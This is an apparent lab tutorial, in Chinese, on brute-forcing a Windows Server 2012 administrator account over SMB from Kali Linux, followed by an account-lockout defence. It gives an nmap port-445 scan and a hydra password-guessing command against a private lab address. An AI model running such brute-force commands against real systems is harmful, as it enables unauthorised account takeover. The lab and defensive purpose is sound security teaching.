环境
靶机:windows server 2012
攻击机:kali linux
靶机环境
- 密码为弱口令
- 设定登录失败的次数 锁定用户账号,关闭密码复杂度
步骤
1.在kali上探测目标主机(可在目标主机通过ipconfig查看目标主机IP)是否开启445端口
nmap 192.168.99.105 -p 445
2.使用hydra对已知的administrator账号进行爆破(注意pass.txt的路径)
hydra -l administrator -P pass.txt smb://192.168.99.105
3.暴力破解防御措施 – 设定登录失败的次数 锁定用户账号
继续爆破,账号被锁定不能登录